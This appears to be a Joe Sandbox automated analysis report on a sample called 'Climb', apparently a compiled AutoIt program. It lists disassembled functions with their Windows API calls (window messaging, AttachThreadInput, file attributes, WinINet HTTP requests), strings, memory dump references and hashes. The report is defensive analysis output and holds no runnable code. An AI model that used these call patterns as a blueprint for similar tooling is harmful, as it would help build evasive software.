SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00AF4648
SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00AF4663
SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00AF467E
SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00AF4692
SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00AF46AF

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: MessageSend$LongWindow
String ID:
API String ID: 312131281-0
Opcode ID: a7ac44521eff2c5fea2ccf5014269c7947e9d3119ad576ee1833a627d98697be
Instruction ID: 0f22c68c9d1167c2f4cd37f0648ab6e68759eb7e0529071d132a2e5756151f37
Opcode Fuzzy Hash: a7ac44521eff2c5fea2ccf5014269c7947e9d3119ad576ee1833a627d98697be
Instruction Fuzzy Hash: 86615975A00208AFDB21DFA8CD81EFE77B8EF09714F204169FA14E72A1D774A946DB50

Function 00ACBAF6 Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00ACBB18
GetForegroundWindow.USER32(00000000,?,?,?,?,?,00ACABA8,?,00000001), ref: 00ACBB2C
GetWindowThreadProcessId.USER32(00000000), ref: 00ACBB33
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00ACABA8,?,00000001), ref: 00ACBB42
GetWindowThreadProcessId.USER32(?,00000000), ref: 00ACBB54
AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00ACABA8,?,00000001), ref: 00ACBB6D
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00ACABA8,?,00000001), ref: 00ACBB7F
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00ACABA8,?,00000001), ref: 00ACBBC4
AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00ACABA8,?,00000001), ref: 00ACBBD9
AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00ACABA8,?,00000001), ref: 00ACBBE4

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: 9af037b4fb3e9421bc51a48599b44a9d855dfef02ba89054c08a4f579f4e5bad
Instruction ID: bb6a8a71ad63ca8e35a05793c4b6bdf9dcebdb3821a726388c8745843f2c95f8
Opcode Fuzzy Hash: 9af037b4fb3e9421bc51a48599b44a9d855dfef02ba89054c08a4f579f4e5bad
Instruction Fuzzy Hash: D331A271A24304AFDB16DBA4DD86F7D77AAEB54312F224009FA05DB1A4DB75AC40CB30

Function 00A92FF3 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00A93007

Part of subcall function 00A92D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00A9DB51,00B31DC4,00000000,00B31DC4,00000000,?,00A9DB78,00B31DC4,00000007,00B31DC4,?,00A9DF75,00B31DC4), ref: 00A92D4E
Part of subcall function 00A92D38: GetLastError.KERNEL32(00B31DC4,?,00A9DB51,00B31DC4,00000000,00B31DC4,00000000,?,00A9DB78,00B31DC4,00000007,00B31DC4,?,00A9DF75,00B31DC4,00B31DC4), ref: 00A92D60

_free.LIBCMT ref: 00A93013
_free.LIBCMT ref: 00A9301E
_free.LIBCMT ref: 00A93029
_free.LIBCMT ref: 00A93034
_free.LIBCMT ref: 00A9303F
_free.LIBCMT ref: 00A9304A
_free.LIBCMT ref: 00A93055
_free.LIBCMT ref: 00A93060
_free.LIBCMT ref: 00A9306E

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: d99eba6a603b67f2e6d64b67736dd7e4fea3c17503c502955d7b51757fc2486c
Instruction ID: ef526b7fbb4f583bc0821fcac30dfb8c714caf9e336fd594f0031d989671a980
Opcode Fuzzy Hash: d99eba6a603b67f2e6d64b67736dd7e4fea3c17503c502955d7b51757fc2486c
Instruction Fuzzy Hash: BC118676600108BFCF11EF94CA82EDD3BB5EF05354B9145A5FA089F222DA32EF519B90

Function 00A62AB0 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00A62AF9
OleUninitialize.OLE32(?,00000000), ref: 00A62B98
UnregisterHotKey.USER32(?), ref: 00A62D7D
DestroyWindow.USER32(?), ref: 00AA3A1B
FreeLibrary.KERNEL32(?), ref: 00AA3A80
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00AA3AAD

Strings

close all, xrefs: 00A62AF4

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: 75e2b0ce1d9ea68d0dfc3ebf164eda10dd16eaa3396ab5bb4faa9d11d67005e6
Instruction ID: 941e977d2d3c1433baf9eaed92490b2d69757009e3e6c57676d697a3d2c541f5
Opcode Fuzzy Hash: 75e2b0ce1d9ea68d0dfc3ebf164eda10dd16eaa3396ab5bb4faa9d11d67005e6
Instruction Fuzzy Hash: 39D15A32701622DFCB29EF54C989B69F7B1EF05750F1142ADE54AAB2A1CB31AD12CF50

Function 00AD8835 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00AD89F2
SetCurrentDirectoryW.KERNEL32(?), ref: 00AD8A06
GetFileAttributesW.KERNEL32(?), ref: 00AD8A30
SetFileAttributesW.KERNEL32(?,00000000), ref: 00AD8A4A
SetCurrentDirectoryW.KERNEL32(?), ref: 00AD8A5C
SetCurrentDirectoryW.KERNEL32(?), ref: 00AD8AA5
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00AD8AF5

Strings

*.*, xrefs: 00AD8AAB

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile
String ID: *.*
API String ID: 769691225-438819550
Opcode ID: 06991066873a9f8d6504842bef3da7f0ec2c04aeeb5474f31547c225c4a572e9
Instruction ID: c24ad18286989ee1a6c441bf4688915797554dd8a08ec5b7abdccfeddc2517eb
Opcode Fuzzy Hash: 06991066873a9f8d6504842bef3da7f0ec2c04aeeb5474f31547c225c4a572e9
Instruction Fuzzy Hash: BC817C729042059BCB24EF54C954ABEB3E8BF84350F58481BF8C6D7350EB39E945DB92

Function 00A67447 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 00A674D7

Part of subcall function 00A67567: GetClientRect.USER32(?,?), ref: 00A6758D
Part of subcall function 00A67567: GetWindowRect.USER32(?,?), ref: 00A675CE
Part of subcall function 00A67567: ScreenToClient.USER32(?,?), ref: 00A675F6

GetDC.USER32 ref: 00AA6083
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00AA6096
SelectObject.GDI32(00000000,00000000), ref: 00AA60A4
SelectObject.GDI32(00000000,00000000), ref: 00AA60B9
ReleaseDC.USER32(?,00000000), ref: 00AA60C1
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00AA6152

Strings

U, xrefs: 00AA6021

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: 0065242b67d48d2a8ec670a4a064e3bde4be2c82279179f793fcab091c8c952f
Instruction ID: 7d546879fec1b30daadd1a89501a1f4e3d316df288fc27dd20a3c033d2c571f4
Opcode Fuzzy Hash: 0065242b67d48d2a8ec670a4a064e3bde4be2c82279179f793fcab091c8c952f
Instruction Fuzzy Hash: F6719F31500205DFCF25DFA4C888ABE7FB5FF4A315F288269E9555B1A6DB318881DF50

Function 00AF955E Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00A6249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00A624B0

Part of subcall function 00A619CD: GetCursorPos.USER32(?), ref: 00A619E1
Part of subcall function 00A619CD: ScreenToClient.USER32(00000000,?), ref: 00A619FE
Part of subcall function 00A619CD: GetAsyncKeyState.USER32(00000001), ref: 00A61A23
Part of subcall function 00A619CD: GetAsyncKeyState.USER32(00000002), ref: 00A61A3D

ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?), ref: 00AF95C7
ImageList_EndDrag.COMCTL32 ref: 00AF95CD
ReleaseCapture.USER32 ref: 00AF95D3
SetWindowTextW.USER32(?,00000000), ref: 00AF966E
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00AF9681
DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?), ref: 00AF975B

Strings

@GUI_DROPID, xrefs: 00AF96AD
@GUI_DRAGFILE, xrefs: 00AF96F6

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID
API String ID: 1924731296-2107944366
Opcode ID: bcde56a27a74a54aab56d26a10410e6940a066567921ecab38e73b1afb306f8f
Instruction ID: 197cf5e554b5b05013b67317acd0c38e708c12e60f6768a0d7a59d81c428a76f
Opcode Fuzzy Hash: bcde56a27a74a54aab56d26a10410e6940a066567921ecab38e73b1afb306f8f
Instruction Fuzzy Hash: E151AC71504304AFD704EF64CD56FBA77E5FB88710F100A28FA969B2E2DB709909CB52

Function 00ADCC98 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00ADCCB7
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00ADCCDF
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00ADCD0F
GetLastError.KERNEL32 ref: 00ADCD67
SetEvent.KERNEL32(?), ref: 00ADCD7B
InternetCloseHandle.WININET(00000000), ref: 00ADCD86

Strings

, xrefs: 00ADCD00

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: d88560b7de1061e8794f358f471cc726ee51f3b44534867dd0ad7caf5ca287fc
Instruction ID: e91c2e8be81048e73fbc17fbfe28caecff60204764c9df0f7299b180429db876
Opcode Fuzzy Hash: d88560b7de1061e8794f358f471cc726ee51f3b44534867dd0ad7caf5ca287fc
Instruction Fuzzy Hash: FE318F71500209AFD721EFA48D84ABB7BFEEF45750B50452AF48696310DB34E905DB60

Function 00ACA215 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00AA55AE,?,?,Bad directive syntax error,00AFDCD0,00000000,00000010,?,?), ref: 00ACA236
LoadStringW.USER32(00000000,?,00AA55AE,?), ref: 00ACA23D

Part of subcall function 00A6B329: _wcslen.LIBCMT ref: 00A6B333

MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00ACA301

Strings

Line %d (File "%s"):, xrefs: 00ACA2A7
%s (%d) : ==> %s.: %s %s, xrefs: 00ACA26B
Line %d:, xrefs: 00ACA28C
Error: , xrefs: 00ACA2CF
., xrefs: 00ACA2E7

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: HandleLoadMessageModuleString_wcslen
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 858772685-4153970271
Opcode ID: dc7983e2387c66f8d028247f72c5093755580de43d02c89d1117f4ff7046a075
Instruction ID: f0d74bf8dd5acaa903fcf44f2d0022ecf962bcf5f5f0f3e95f0806e7dd608f51
Opcode Fuzzy Hash: dc7983e2387c66f8d028247f72c5093755580de43d02c89d1117f4ff7046a075
Instruction Fuzzy Hash: 61216F3195021EEFCF02EFA0CC16EFE7B79BF18304F004459B519A51A2EB719658DB11

Function 00AC29EC Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 00AC29F8
GetClassNameW.USER32(00000000,?,00000100), ref: 00AC2A0D
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00AC2A9A

Strings

largeicons, xrefs: 00AC2A2E
smallicons, xrefs: 00AC2A62
details, xrefs: 00AC2A48
list, xrefs: 00AC2A7C
SHELLDLL_DefView, xrefs: 00AC2A19

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: ClassMessageNameParentSend
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1290815626-3381328864
Opcode ID: c1fe45033ae8e43314eea0c367fdc2378b800dde1e84cae82edfde9f318d327a
Instruction ID: b1b29aea8d5152ccbcd236a2dc8ff3066583a6dbc58bdfdc574958ee2363ccf9
Opcode Fuzzy Hash: c1fe45033ae8e43314eea0c367fdc2378b800dde1e84cae82edfde9f318d327a
Instruction Fuzzy Hash: EF110676684307F9FA257320EC0BFA63BEC8F19764B21401AF904F50E1FBA1A8014714

Function 00A67567 Relevance: 13.8, APIs: 9, Instructions: 291COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 00A6758D
GetWindowRect.USER32(?,?), ref: 00A675CE
ScreenToClient.USER32(?,?), ref: 00A675F6
GetClientRect.USER32(?,?), ref: 00A6773A
GetWindowRect.USER32(?,?), ref: 00A6775B

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: Rect$Client$Window$Screen
String ID:
API String ID: 1296646539-0
Opcode ID: 880c0488a0e5f53789c1891b019739b51e2197dfff986bf8d5c04a91ee0c2a1c
Instruction ID: 60b12b3dab7756277227bf0d94c0298b6e4f62d765d13b673df4d025c4cca1c8
Opcode Fuzzy Hash: 880c0488a0e5f53789c1891b019739b51e2197dfff986bf8d5c04a91ee0c2a1c
Instruction Fuzzy Hash: 09C1577991464AEFDB10CFA8C980BEDBBB1FF08314F14841AE8A5E7250DB34A951DF60

Function 00A9D210 Relevance: 13.7, APIs: 9, Instructions: 209COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 00A9D237
_free.LIBCMT ref: 00A9D2A2
_free.LIBCMT ref: 00A9D2C8
_free.LIBCMT ref: 00A9D2F1
_free.LIBCMT ref: 00A9D329
_free.LIBCMT ref: 00A9D35A
_free.LIBCMT ref: 00A9D39B
SetEnvironmentVariableA.KERNEL32(00000000,00000000), ref: 00A9D41C
_free.LIBCMT ref: 00A9D435

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: _free$EnvironmentVariable___from_strstr_to_strchr
String ID:
API String ID: 1282221369-0
Opcode ID: 945c4ded011ab948c53e8a4ea2eb65102beb0c319dda982d84621425c91a1e61
Instruction ID: 8b1b680fad9812ed106bbf1424ff0b8eb6783a4e060af8d3976ec3f57cea1b33
Opcode Fuzzy Hash: 945c4ded011ab948c53e8a4ea2eb65102beb0c319dda982d84621425c91a1e61
Instruction Fuzzy Hash: E7610A71B04301AFDF25AF7CD981BAE7BE8EF02324F14057DE945AB281EB3199818791

Function 00AF5B72 Relevance: 13.7, APIs: 9, Instructions: 162windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00AF5C24
ShowWindow.USER32(?,00000000), ref: 00AF5C65
ShowWindow.USER32(?,00000005,?,00000000), ref: 00AF5C6B
SetFocus.USER32(?,?,00000005,?,00000000), ref: 00AF5C6F

Part of subcall function 00AF79F2: DeleteObject.GDI32(00000000), ref: 00AF7A1E

GetWindowLongW.USER32(?,000000F0), ref: 00AF5CAB
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00AF5CB8
InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00AF5CEB
SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00AF5D25
SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00AF5D34

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
String ID:
API String ID: 3210457359-0
Opcode ID: 40944ce2965c6d36ebd7a6b11641d4ad84fc861e93519e3f1b0a435bde4c42d0
Instruction ID: 9b906b91519fec8db2dcaf1640a811ca91d7dcc26ad173294bfb632163e4d239
Opcode Fuzzy Hash: 40944ce2965c6d36ebd7a6b11641d4ad84fc861e93519e3f1b0a435bde4c42d0
Instruction Fuzzy Hash: 2F517B30E41A0CBFEF259BF4CC49BB83BA6AB05750F144112F725DA1E1D775A981EB40

Function 00A613A6 Relevance: 13.7, APIs: 9, Instructions: 155windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00AA28D1
ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 00AA28EA
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00AA28FA
ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 00AA2912
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00AA2933
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00A611F5,00000000,00000000,00000000,000000FF,00000000), ref: 00AA2942
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00AA295F
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00A611F5,00000000,00000000,00000000,000000FF,00000000), ref: 00AA296E

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend
String ID:
API String ID: 1268354404-0
Opcode ID: 61fbb8f78da5d9ef05f02ea2497e0ce335173d68d2e93b1b5e3ab903a3cad51d
Instruction ID: 587f88a73a923a506521be0c63b96f0bfb8c80b9f63b12b7c4101a200a22cff2
Opcode Fuzzy Hash: 61fbb8f78da5d9ef05f02ea2497e0ce335173d68d2e93b1b5e3ab903a3cad51d
Instruction Fuzzy Hash: C4518870600209AFDB24DF69CC85FAA7BB6FF48760F144528F9469B2E0DB70E991DB50

Function 00ADCB88 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00ADCBC7
GetLastError.KERNEL32 ref: 00ADCBDA
SetEvent.KERNEL32(?), ref: 00ADCBEE

Part of subcall function 00ADCC98: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00ADCCB7
Part of subcall function 00ADCC98: GetLastError.KERNEL32 ref: 00ADCD67
Part of subcall function 00ADCC98: SetEvent.KERNEL32(?), ref: 00ADCD7B
Part of subcall function 00ADCC98: InternetCloseHandle.WININET(00000000), ref: 00ADCD86

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
